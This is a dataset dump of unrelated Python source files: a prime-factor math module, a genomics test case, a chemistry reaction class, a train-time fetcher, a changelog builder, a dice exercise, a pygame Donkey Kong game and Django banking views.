1)/2)):\n if ar[d] == 0:\n continue # not prime\n p = ar[d]\n # got the prime. Now, mark off its multiples.\n # \n # ar[i] = 2 * i - 1\n # if p is odd :\n # d = (p - 1) / 2\n # => d * (1 + p) =\n # = (p - 1) / 2 * (1 + p)\n # = (p^2 - 1) / 2\n # ar[(p^2 - 1) / 2] = p^2\n # so, d * (1+p) is the index of p^2. And, we can step out p\n # at a time because even numbers are skipped.\n for j in xrange(d * (1+p), M, p):\n ar[j] = 0\n\n # 2 was never in the results, so put it back in the front.\n ar[0] = 2\n\n # return the non-zeros\n return [x for x in ar if x]\n\n\ndef prime_factor(N):\n \"\"\"Find a prime factor for each number \n\n Use the sieve of eratosthenes to find the largest\n prime factor of each number up to N-1.\n\n >>> prime_factor(20)\n [0, 0, 1, 1, 2, 1, 3, 1, 2, 3, 5, 1, 3, 1, 7, 5, 2, 1, 3, 1]\n\n \"\"\"\n\n # For simplicity, this does all numbers, not just\n # odd.\n\n\n ar = [1] * N \n ar[0], ar[1] = 0, 0\n \n # Check each entry in the array in order. If the entry\n # is not marked off, it is prime. When we find a prime,\n # remove its multiples from the rest of the list.\n for d in xrange(1,N/2+2):\n if ar[d] == 1:\n # Prime!\n for j in xrange(2*d, N, d):\n ar[j] = d\n return ar\n\ndef factorize(x, factors):\n \"\"\"Find the prime factorization of x\n\n FACTORS is the result of calling prime_factor with N > x.\n This function finds all of the prime factors of x, and their\n powers.\n\n >>> factors = prime_factor(201)\n >>> factorize(200, factors)\n [(5, 2), (2, 3)]\n \n \"\"\"\n result = []\n\n while x > 1:\n p = factors[x]\n if p == 1:\n p = x\n c = 0\n while x % p == 0:\n c += 1\n x /= p\n result.append((p, c))\n return result\n\ndef extended_euclid(m, n):\n \"\"\"Euclid's algorithm, extended to solve a*m + b*n = d\n\n Returns (a, b, d) given m,n. Assumes m,n > 0\n \n Algorithm E, Art of Computer Programming, Chapter 1\n\n >>> extended_euclid(1769, 551)\n (5, -16, 29)\n\n\n \"\"\"\n\n # At top top of each loop, gcd(c,d) == gcd(m, n), and\n # a * m + b * n == d\n\n a, ap = 0, 1\n b, bp = 1, 0\n c = m\n d = n\n while True:\n q = c / d\n r = c - d * q\n if r == 0:\n return a, b, d\n c,d = d, r\n ap, a = a, ap - q * a\n bp, b = b, bp - q * b\n\n\nif __name__ == \"__main__\":\n # Run the doctests as a smoke test.\n import doctest\n doctest.testmod()\n\n \n\n","sub_path":"my_math.py","file_name":"my_math.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"388311464","text":"import os\nimport sys\nimport tempfile\nimport unittest\nfrom epitome.models import *\nfrom epitome.dataset import *\n\n# set Epitome data path to test data files for testing\n# this data was saved using functions.saveToyData(/epitome/test/daata)\ndir_path = os.path.dirname(os.path.realpath(__file__))\nos.environ[\"EPITOME_DATA_PATH\"] = os.path.abspath(os.path.join(dir_path, \"data\",\"test\"))\n\nS3_TEST_PATH = 'https://epitome-data.s3-us-west-1.amazonaws.com/test.zip'\n\nclass EpitomeTestCase(unittest.TestCase):\n\n\tdef __init__(self, *args, **kwargs):\n\t\t# download test data to parent dir of EPITOME_DATA_PATH if it was not yet downloaded\n\t\tdownload_and_unzip(S3_TEST_PATH, os.path.dirname(os.environ[\"EPITOME_DATA_PATH\"]))\n\t\tsuper(EpitomeTestCase, self).__init__(*args, **kwargs)\n\n\tdef getFeatureData(self,\n\t\t\t\t\ttargets,\n\t\t\t\t\tcells,\n\t\t\t\t\tsimilarity_targets = ['DNase'],\n\t\t\t\t\tmin_cells_per_target = 3,\n\t\t\t\t\tmin_targets_per_cell = 1):\n\n\t\t# returns matrix, cellmap, assaymap\n\t\treturn EpitomeDataset.get_assays(\n\t\t\t\ttargets = targets,\n\t\t\t\tcells = cells,\n\t\t\t\tsimilarity_targets = similarity_targets,\n\t\t\t\tmin_cells_per_target = min_cells_per_target,\n\t\t\t\tmin_targets_per_cell = min_targets_per_cell)\n\n\tdef makeSmallModel(self):\n\t\teligible_cells = ['K562','HepG2','H1','A549','HeLa-S3']\n\t\teligible_targets = ['DNase','CTCF']\n\n\t\tdataset = EpitomeDataset(targets = eligible_targets,\n\t\t\tcells = eligible_cells)\n\n\n\t\treturn EpitomeModel(dataset,\n\t\t\ttest_celltypes = ['K562'])\n\n\n\tdef tmpFile(self):\n\t\ttempFile = tempfile.NamedTemporaryFile(delete=True)\n\t\ttempFile.close()\n\t\treturn tempFile.name\n","sub_path":"epitome/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"216728644","text":"from kinbot.reac_General import GeneralReac\n\n\nclass CpdHMigration(GeneralReac):\n max_step = 14\n scan = 0\n skip = 1\n \n\n def get_constraints(self, step, geom):\n fix = []\n change = []\n release = []\n if step < self.max_step:\n fix_bonds(fix)\n\n if step == 0:\n self.set_angle_single(-2, -1, 0, 70., change)\n\n if step == 1:\n fval = 1.35\n self.set_bond(-2, -1, fval, change)\n self.set_bond(0, -1, fval, change)\n \n self.clean_constraints(change, fix)\n\n return step, fix, change, release\n","sub_path":"kinbot/reac_cpd_H_migration.py","file_name":"reac_cpd_H_migration.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"420294976","text":"#!/usr/bin/env python3\nfrom lxml import etree as ET\nimport requests\nimport stations\n\nr = requests.get(\n 'http://iris2.rail.co.uk/tiger/{}.xml'.format(stations.iris_id))\nroot = ET.XML(r.content)\n\n\ndef find_train_with_destination(station):\n return root.findall(\"./Service/Destination1[@crs='{}']..\".format(station))\n\n\ndef find_train_with_origin(station):\n return root.findall(\"./Service/Origin1[@crs='{}']..\".format(station))\n\n\ndeparting_services = sum(\n map(find_train_with_destination, stations.departing_train_end_point), [])\n\ndepartDict = dict(\n [\n (i,\n {\n \"departTime\": s.find('DepartTime').get('time'),\n \"delay\": s.find('ServiceStatus').get('status') == 'Delayed',\n \"delayMins\": s.find('Delay').get('Minutes'),\n \"destinationArriveTime\": s.findall(\n \"./Dest1CallingPoints/CallingPoint[@crs='{}']\".format(\n stations.destination))[0].get('etarr')}) for i,\n s in enumerate(departing_services)])\n\narriving_services = sum(\n map(find_train_with_origin, stations.arriving_train_start_point), [])\n\narriveDict = dict([(i,\n {\"arriveTime\": s.find('ArriveTime').get('time'),\n \"delay\": s.find('ServiceStatus').get('status') == 'Delayed',\n \"delayMins\": s.find('Delay').get('Minutes'),\n \"expectedArriveTime\": s.find('ExpectedArriveStatus').get('time')\n }) for i, s in enumerate(arriving_services)])\n\nprint(arriveDict)\nprint(departDict)\n","sub_path":"train-time.py","file_name":"train-time.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"411629669","text":"#!/usr/local/bin/python\n\"\"\"\n Copyright (c) 2020 Ad Schellevis \n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport os\nimport argparse\nimport requests\nimport zipfile\nimport collections\nimport re\nfrom packaging import version\nfrom jinja2 import Template\n\ndef download_zip(target_filename):\n req = requests.get(\"https://github.com/opnsense/changelog/archive/master.zip\", stream=True)\n if req.status_code == 200:\n req.raw.decode_content = True\n with open(target_filename, 'wb') as f_out:\n while True:\n data = req.raw.read(10240)\n if not data:\n break\n else:\n f_out.write(data)\n\ndef parse_change_log(payload, this_version):\n result = {\n \"release_date\": \"---\",\n \"prelude\": list(),\n \"content\": list()\n }\n all_tokens = set()\n all_token_links = dict()\n first_line = False\n prelude_line = this_version.count(\".\") == 1\n rst_content = list()\n lines = payload.split(\"\\n\")\n for idx, line in enumerate(lines):\n content_line = None\n # general cleanups\n line = line.replace('*', '\\*')\n if line.find('`') > -1:\n line = re.sub(r'(`)([^`|\\']*)([`|\\'])', r':code:`\\2`', line)\n #\n for token in re.findall(r'(\\[[0-9]{1,2}\\])', line):\n all_tokens.add(token)\n if idx < 3 and line.find('@') > -1:\n result[\"release_date\"] = line.split('@')[1].strip()\n elif first_line is False and line.strip() != \"\":\n # strip tag line\n first_line = idx\n if line.find('OPNsense') > -1:\n content_line = line\n elif line == '--':\n # chop tagine\n del result['content'][-3:]\n elif line.startswith('o '):\n content_line = \"*%s\" % line[1:] # bullet list\n elif line.startswith('# '):\n # literal (code) block\n if not lines[idx-1].startswith('# '):\n content_line = \".. code-block::\\n\\n %s\" % line\n else:\n content_line = \" %s\" % line\n elif line.startswith('[') and line[0:line.find(']')+1] in all_tokens:\n token = line[0:line.find(']')+1]\n all_token_links[token] = line[len(token)+1:].strip()\n else:\n content_line = line\n\n if content_line is not None:\n result['content'].append(content_line)\n if prelude_line:\n result['prelude'].append(content_line)\n\n # prelude exit\n if prelude_line and line.find('https://opnsense.org/download/') > -1:\n prelude_line = False\n\n result[\"content\"] = \"\\n\".join(result[\"content\"])\n result[\"prelude\"] = \"\\n\".join(result[\"prelude\"])\n # replace links\n for section in ['content', 'prelude']:\n for token in all_token_links:\n result[section] = result[section].replace(token, \" `%s <%s>`__ \" % (token, all_token_links[token]))\n return result\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--skip_download', help='skip downloading github rep', action='store_true')\n cmd_args = parser.parse_args()\n\n root_dir = os.path.dirname(os.path.abspath(__file__))\n changelog_zip = \"%s/changelog_github.zip\" % root_dir\n if not cmd_args.skip_download:\n download_zip(changelog_zip)\n\n if os.path.isfile(changelog_zip):\n template_data = {\n 'major_versions': collections.OrderedDict(),\n 'versions': collections.OrderedDict(),\n 'nicknames': collections.OrderedDict(),\n }\n all_versions = dict()\n # read all changelogs (from zip)\n with zipfile.ZipFile(changelog_zip, mode='r', compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n fparts = item.filename.split('/')\n if len(fparts) > 3 and fparts[1] == 'doc' and item.file_size > 0:\n all_versions[fparts[3]] = zf.open(item).read().decode()\n\n for my_version in sorted(all_versions, key=lambda x: version.Version(x.replace('.r','rc')), reverse=True):\n major_version = \".\".join(my_version.split('.')[:2])\n if major_version not in template_data['major_versions']:\n template_data['major_versions'][major_version] = dict()\n template_data['versions'][my_version] = parse_change_log(all_versions[my_version], my_version)\n\n if major_version == my_version:\n template_data['nicknames'][my_version] = \"\"\n tmp = all_versions[my_version].replace('\\n', ' ')\n m = re.match(r'.*nicknamed [\"\\'](?P[^\"\\']+)', tmp)\n if m:\n template_data['nicknames'][my_version] = m.groupdict()['nickname']\n\n # root menu index\n with open(\"%s/source/releases.rst\" % root_dir, 'w') as f_out:\n template = Template(open(\"%s/source/releases.rst.in\" % root_dir, \"r\").read())\n f_out.write(template.render(template_data))\n\n # per version rst file\n template = Template(open(\"%s/source/releases/default.rst.in\" % root_dir, \"r\").read())\n for major_version in template_data['major_versions']:\n if major_version in template_data['versions']:\n # wait for the main version before writing a changelog\n with open(\"%s/source/releases/%s.rst\" % (root_dir, major_version), 'w') as f_out:\n template_data['this_version'] = major_version\n f_out.write(template.render(template_data))\n","sub_path":"collect_changelogs.py","file_name":"collect_changelogs.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"634011489","text":"import matplotlib.pyplot as plt\n\nfrom die import Die\n\n\ncount = 100\ndies = [Die(), Die()]\nnum = 1\n\ndef roll_all(dies):\n \"\"\"所有骰子掷一次相加结果\"\"\"\n result = 1\n for die in dies:\n result *= die.roll()\n return result\n\ndef max_result(dies):\n \"\"\"最大值\"\"\"\n result = 1\n for die in dies:\n result *= die.num_sides\n return result\n\n#掷几次骰子,将结果存放在一个列表中\nresults = [roll_all(dies) for n in range(count)]\n\nfrequencies = [results.count(v) for v in range(1, len(results) + 1)]\n\nprint(len(results))\nprint(len(frequencies))\n\n#matplotlib直方图\n#...\n","sub_path":"PythonCrashCourse/chapter15/15_10.py","file_name":"15_10.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"5890074","text":"#!/usr/bin/env python\n#######################################\n# Author : Dhruv Khattar #\n#####################################\n\n\"\"\" Importing libararies \"\"\"\nimport pygame\nimport os\nimport sys\nimport time\nimport random\n\n\"\"\" Importing Modules \"\"\"\nimport Person\nimport Player\nimport Donkey\nimport Board\nimport Fireball\n\n\"\"\"Declaring Screen Dimensions \"\"\"\nWIDTH = 1350\nHEIGHT = 780\nBLOCK = 30\n\nclass Game(object):\n \"\"\" This class represents an instance of the game. \"\"\"\n \"\"\"If we want to restart the game , then we just need to create a new instance of this class. \"\"\"\n \n def __init__(self,score,lives,level):\n \"\"\" Constructor Function: called automatically when an instance of the class is created \"\"\"\n \n \"\"\"Creating Player \"\"\"\n self.player = Player.Player()\n \n \"\"\" Creating a List for Donkey and Fireballs\"\"\"\n self.fireball_sprites = pygame.sprite.Group()\n\n \"\"\" Declaring Current Level \"\"\"\n self.current_level = Board.Board(self.player)\n\n \"\"\" Creating various Sprite Groups \"\"\"\n self.moving_sprites = pygame.sprite.Group()\n self.donkey_sprites = pygame.sprite.Group()\n self.player.level = self.current_level\n\n \"\"\" Player's initial Location \"\"\"\n self.player.rect.x = 30\n self.player.rect.y = HEIGHT - self.player.rect.height-30\n \n \"\"\"Adding Player in moving_sprites to make updates easy\"\"\"\n self.moving_sprites.add(self.player)\n\n \"\"\" List that contains random numbers for turning Donkey \"\"\"\n self.donkeyturn = []\n\n \"\"\" Creating Donkey and adding it to lists \"\"\"\n for i in range(0,level):\n donkey = Donkey.Donkey()\n \n \"\"\"Donkey's initial Location\"\"\"\n donkey.rect.x = 30+30*i\n donkey.rect.y = 120\n \n \"\"\"Adding Donkey in various lists\"\"\"\n self.donkey_sprites.add(donkey)\n self.donkeyturn.append(random.randint(100,200))\n self.moving_sprites.add(donkey)\n \n \"\"\" For restarting and respawing \"\"\"\n self.game_over = False\n self.game_win = False\n\n \"\"\" Score Lives Level \"\"\"\n self.level = level\n self.score = score\n self.lives = lives\n\n \"\"\" Flag to check when 'a' or 's' is pressed \"\"\"\n self.flag = 0\n\n \"\"\" Counter to randomize things \"\"\"\n self.counter = 0\n\n\n def checkCollision(self):\n \"\"\" Checks Collision netween Player and fireball_sprites \"\"\"\n\n \"\"\" Checking if Fireball hits Player\"\"\"\n kill_hit = pygame.sprite.spritecollide(self.player,self.fireball_sprites,True)\n if len(kill_hit) > 0:\n \"\"\" Lost a Life \"\"\"\n self.ouch_sound.play()\n self.game_over = True\n \n \"\"\" Checking if Donkey hits Player\"\"\"\n donkey_hit = pygame.sprite.spritecollide(self.player,self.donkey_sprites,True)\n if len(donkey_hit) > 0:\n \"\"\" Ending Game \"\"\"\n self.gameover_sound.play()\n self.game_over = True\n self.lives = 1\n\n\n def collectCoin(self):\n \"\"\" Checks if Player collects a coin and increases the score by 5\"\"\"\n\n coins_hit = pygame.sprite.spritecollide(self.player,self.player.level.coins,True)\n if len(coins_hit) > 0:\n self.score += len(coins_hit)*5\n self.coin_sound.play()\n\n \n def collectLife(self):\n \"\"\" Checks if Player collects a heart and gains a life\"\"\"\n\n hearts_hit = pygame.sprite.spritecollide(self.player,self.player.level.life,True)\n if len(hearts_hit) > 0:\n self.lives += 1\n self.extralife_sound.play()\n\n \n def checkWin(self):\n \"\"\" Checks if the Player has saved the Queen \"\"\"\n\n queen_hit = pygame.sprite.spritecollide(self.player,self.player.level.queen, True)\n\n if len(queen_hit) > 0:\n \"\"\"Player wins the Game\"\"\"\n self.game_win = True\n self.win_sound.play()\n\n\n def editFireball(self):\n \"\"\" Creates and Destroys Fireballs\"\"\"\n \n \"\"\" Removing Fireballs when they reach the Player's spawn position \"\"\"\n for fireball in self.fireball_sprites:\n if fireball.rect.y == HEIGHT - 60 and fireball.rect.x < 45:\n self.fireball_sprites.remove(fireball)\n self.moving_sprites.remove(fireball)\n \n \"\"\" Counter to randomize Fireballs produced by Donkey\"\"\"\n if self.counter%200 == 0:\n \n for donkey in self.donkey_sprites:\n \n \"\"\" Creating a new Fireball\"\"\"\n self.fireball = Fireball.Fireball()\n \n \"\"\" Setting the initial Fireball cordinates to Donkey's cordinates\"\"\"\n self.fireball.rect.x = donkey.rect.x\n self.fireball.rect.y = donkey.rect.y\n self.fireball.level = self.current_level\n \n \"\"\"Setting Fireballs initial vector\"\"\"\n if donkey.change_x > 0:\n self.fireball.change_x = 4\n else:\n self.fireball.change_x = -4\n\n \"\"\" Adding Fireball to moving_sprites and fireball_sprites\"\"\"\n self.moving_sprites.add(self.fireball)\n self.fireball_sprites.add(self.fireball)\n\n\n def turnDonkey(self):\n \"\"\" Function that turns Donkey randomly \"\"\"\n\n i = 0\n for donkey in self.donkey_sprites:\n if self.counter%self.donkeyturn[i] == 0:\n donkey.change_x *= -1\n self.donkeyturn[i] = random.randint(100,200)\n i += 1\n\n\n def process_Events(self):\n \"\"\" Processes all the events and returns True if we Game needs to be Quit \"\"\"\n \n for event in pygame.event.get():\n \"\"\" If Window's closed\"\"\"\n if event.type == pygame.QUIT:\n return True\n \n \"\"\" If a key is pressed\"\"\"\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n return True\n if event.key == pygame.K_a:\n self.player.goLeft()\n if event.key == pygame.K_d:\n self.player.goRight()\n if event.key == pygame.K_w:\n self.flag = 1\n self.player.goUp()\n if event.key == pygame.K_s:\n self.flag = 1\n self.player.goDown()\n if event.key == pygame.K_SPACE:\n self.player.jump()\n if event.key == pygame.K_c:\n if self.game_over and self.lives==1:\n self.__init__(0,3,1)\n if event.key == pygame.K_RETURN:\n if self.game_win:\n self.__init__(self.score+50,self.lives,self.level+1)\n\n \"\"\" If a key pressed is left\"\"\"\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_a and self.player.change_x < 0:\n self.player.stopX()\n if event.key == pygame.K_d and self.player.change_x > 0:\n self.player.stopX()\n if event.key == pygame.K_w :\n self.flag = 0\n self.player.stopY()\n if event.key == pygame.K_s :\n self.flag = 0\n self.player.stopY()\n \n return False\n\n\n def respawn(self):\n \"\"\" Respawns Player in the bottom left corner \"\"\"\n self.game_over = False\n self.score -= 25\n self.lives -= 1\n self.player.rect.x = BLOCK\n self.player.rect.y = HEIGHT - 2*BLOCK\n\n\n def updateSprites(self):\n \"\"\"Updates various Sprites\"\"\"\n self.moving_sprites.update(self.flag)\n\n\n def drawFrame(self,screen):\n \"\"\"Draws the Screen\"\"\"\n\n if self.game_win:\n font = pygame.font.Font(None,100)\n text1 = font.render(\"YOU WIN \", 1 , (0,0,0))\n text2 = font.render(\"Press ENTER to continue\", 1 , (0,0,0))\n textpos1 = text1.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-50)\n textpos2 = text2.get_rect(centerx=WIDTH/2,centery=HEIGHT/2+50)\n screen.blit(text1,textpos1)\n screen.blit(text2,textpos2)\n elif not self.game_over:\n self.current_level.draw(screen)\n self.moving_sprites.draw(screen)\n font = pygame.font.Font(None,36)\n text = font.render(\"SCORE: %s LIVES: %s LEVEL: %s\" % (self.score ,self.lives,self.level), 1 , (0,0,0))\n screen.blit(text,[0,HEIGHT-30])\n else:\n font = pygame.font.Font(None,100)\n if self.lives > 1:\n text = font.render(\"LIVES LEFT: %s \" % (self.lives - 1) , 1 , (0,0,0))\n self.respawn()\n textpos = text.get_rect(centerx=WIDTH/2,centery=HEIGHT/2)\n screen.blit(text,textpos)\n pygame.display.flip()\n time.sleep(0.5)\n else:\n back = pygame.image.load(\"images/DKback.jpg\")\n screen.blit(back,(0,0))\n text1 = font.render(\"YOU LOSE \" , 1 , (0,0,0))\n text2 = font.render(\"SCORE : %s\" % self.score , 1 , (0,0,0))\n text3 = font.render(\"Press C to Restart\" , 1 , (0,0,0))\n textpos1 = text1.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-100)\n textpos2 = text2.get_rect(centerx=WIDTH/2,centery=HEIGHT/2)\n textpos3 = text3.get_rect(centerx=WIDTH/2,centery=HEIGHT/2+100)\n screen.blit(text1,textpos1)\n screen.blit(text2,textpos2)\n screen.blit(text3,textpos3)\n \n \"\"\" Updating the screen i.e. Showing the changes done in this iteration \"\"\"\n pygame.display.flip()\n\n\n\"\"\" Main Program \"\"\"\ndef main():\n \"\"\" Initializing PyGame \"\"\"\n pygame.init()\n\n \"\"\" Initializing Screen \"\"\"\n screen = pygame.display.set_mode((WIDTH,HEIGHT))\n\n \"\"\" Setting Title of the Game\"\"\"\n pygame.display.set_caption(\"Donkey Kong\")\n \n \"\"\" FPS \"\"\"\n clock = pygame.time.Clock()\n \n \"\"\" Counter to check if Game is closed\"\"\"\n done = False\n\n \"\"\" Adding intro sound \"\"\"\n intro = pygame.mixer.Sound(\"sounds/intro.wav\")\n intro.play()\n\n \"\"\" Printing Rules of the Game \"\"\"\n font = pygame.font.Font(None,70)\n font.set_bold(True)\n\n title = pygame.font.Font(None,100).render(\" DONKEY KONG \", 1, (0,255,0))\n name = pygame.font.Font(None , 40).render(\"created by : Dhruv Khattar\", 1, (0,255,0))\n rule = font.render(\" Rules \", 1 , (0,0,0))\n rule1 = font.render(\" - To win the Game , you just have to save the Queen.\", 1 , (0,0,0))\n rule2 = font.render(\" - Player can not climb up a broken Ladder.\", 1 , (0,0,0))\n rule3 = font.render(\" - Coins give you 5 points each.\" , 1, (0,0,0))\n rule4 = font.render(\" - Heart gives you an extra life. \" , 1 , (0,0,0))\n rule5 = font.render(\" - Winning a game gives you 50 points. \" , 1 , (0,0,0))\n rule6 = font.render(\" - If you get hit by a Fireball, you'll respawn , \" , 1 , (0,0,0))\n rule7 = font.render(\" loose a life and get penalized with 25 points. \" , 1 , (0,0,0))\n rule8 = font.render(\" - If you get hit by a Donkey , then you lose the game. \" , 1 , (0,0,0))\n rule9 = font.render(\" - Press any key to play. \" , 1 , (0,0,0))\n \n titlepos = title.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-300)\n namepos = name.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-220)\n rulepos = rule.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-180)\n textpos1 = rule1.get_rect(centery=HEIGHT/2-120)\n textpos2 = rule2.get_rect(centery=HEIGHT/2-60)\n textpos3 = rule3.get_rect(centery=HEIGHT/2)\n textpos4 = rule4.get_rect(centery=HEIGHT/2+60)\n textpos5 = rule5.get_rect(centery=HEIGHT/2+120)\n textpos6 = rule6.get_rect(centery=HEIGHT/2+180)\n textpos7 = rule7.get_rect(centery=HEIGHT/2+240)\n textpos8 = rule8.get_rect(centery=HEIGHT/2+300)\n textpos9 = rule9.get_rect(centery=HEIGHT/2+360)\n \n back = pygame.image.load(\"images/DKback.jpg\")\n screen.blit(back,(0,0))\n screen.blit(name,namepos)\n screen.blit(title,titlepos)\n screen.blit(rule1,textpos1)\n screen.blit(rule2,textpos2)\n screen.blit(rule3,textpos3)\n screen.blit(rule4,textpos4)\n screen.blit(rule5,textpos5)\n screen.blit(rule6,textpos6)\n screen.blit(rule7,textpos7)\n screen.blit(rule8,textpos8)\n screen.blit(rule9,textpos9)\n\n pygame.display.flip()\n\n flag = 0\n while 1:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN :\n flag = 1\n if flag:\n break\n\n \"\"\" Initializing Game \"\"\"\n game = Game(0,3,1)\n \n \"\"\" Adding Sounds \"\"\"\n game.ouch_sound = pygame.mixer.Sound(\"sounds/ouch.ogg\")\n game.coin_sound = pygame.mixer.Sound(\"sounds/coin.ogg\")\n game.win_sound = pygame.mixer.Sound(\"sounds/win.ogg\")\n game.gameover_sound = pygame.mixer.Sound(\"sounds/gameover.ogg\")\n game.extralife_sound = pygame.mixer.Sound(\"sounds/extralife.ogg\")\n pygame.mixer.music.load(\"sounds/bacmusic.wav\")\n\n pygame.mixer.music.play(-1)\n \n \"\"\" Main Program Loop \"\"\"\n while not done:\n \n \"\"\" Process Key Strokes \"\"\"\n done = game.process_Events()\n \n \"\"\"Adding Fireballs\"\"\"\n game.editFireball()\n \n \"\"\" Randomizing turning of Donkey \"\"\"\n game.turnDonkey()\n \n \"\"\" Update Sprites \"\"\"\n game.updateSprites()\n \n \"\"\" Checking if Player collects a Coin \"\"\"\n game.collectCoin()\n \n \"\"\" Checking if Player gains a life \"\"\"\n game.collectLife()\n\n \"\"\" Checking if Player dies \"\"\"\n game.checkCollision()\n \n \"\"\" Checking if Player Wins the Game \"\"\"\n game.checkWin()\n \n \"\"\" Drawing the Screen \"\"\"\n game.drawFrame(screen)\n \n \"\"\" FPS Pause for the next Frame\"\"\"\n clock.tick(60)\n\n \"\"\" Incrementing counter \"\"\"\n game.counter += 1\n\n\"\"\" Close Screen and exit \"\"\"\npygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"201402087/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"37968885","text":"from django.db import transaction\nfrom django.urls import reverse_lazy\nfrom django.views import generic\nfrom django.views.generic import CreateView\nfrom django.views.generic import FormView\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import UpdateView\n\nfrom core.forms.jursit import Block_Account_form, Jursit_ChequeDetail_Form, Jursit_LoanDetail_Form\nfrom core.models import ChequeIssue, Account, Cashier, Transaction, LoanApplication\n\n\nclass Block_Account_view(FormView):\n template_name = 'core/simple_from_with_single_button.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Block_Account_form\n\n @transaction.atomic\n def form_valid(self, form):\n account = form.cleaned_data.get('account')\n account.is_blocked = True\n account.save()\n return super(Block_Account_view, self).form_valid(form)\n\n#\n# class Block_Account_view(FormView):\n# template_name = 'core/simple_from_with_single_button.html'\n# success_url = reverse_lazy('core:main_panel')\n# form_class = Block_Account_form\n#\n# @transaction.atomic\n# def form_valid(self, form):\n# account = form.cleaned_data.get('account')\n# account.is_blocked = True\n# account.save()\n#\n# return super(Block_Account_view, self).form_valid(form)\n#\n\n\n\nclass Jursit_Check_Issue_Requests_view(ListView):\n model = ChequeIssue\n template_name = 'core/jursit_cheque_issue.html'\n context_object_name = 'cheque_issue_list'\n\n def get_queryset(self):\n return ChequeIssue.objects.filter(legal_expert_validation= 'NA').order_by('date')\n\n\n\nclass Jursit_ChequeDetailView(UpdateView):\n model = ChequeIssue\n template_name = 'core/jursit_cheque_detail.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Jursit_ChequeDetail_Form\n\n def form_valid(self, form):\n legal_expert_validation = form.cleaned_data.get('legal_expert_validation')\n cheque_issue = ChequeIssue.objects.get(id=self.kwargs['pk'])\n cheque_issue.legal_expert_validation = legal_expert_validation\n cheque_issue.save()\n return super(Jursit_ChequeDetailView, self).form_valid(form)\n\n\nclass Jursit_Loan_Requests_view(ListView):\n model = LoanApplication\n template_name = 'core/jursit_loan_issue.html'\n context_object_name = 'loan_list'\n\n def get_queryset(self):\n return LoanApplication.objects.filter(legal_expert_validation= 'NA')\n\n\n\nclass Jursit_LoanDetailView(UpdateView):\n model = LoanApplication\n template_name = 'core/jursit_loan_detail.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Jursit_LoanDetail_Form\n\n def form_valid(self, form):\n legal_expert_validation = form.cleaned_data.get('legal_expert_validation')\n loan_application = LoanApplication.objects.get(id=self.kwargs['pk'])\n loan_application.legal_expert_validation = legal_expert_validation\n loan_application.save()\n return super(Jursit_LoanDetailView, self).form_valid(form)\n\n\n","sub_path":"core/views/jursit.py","file_name":"jursit.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
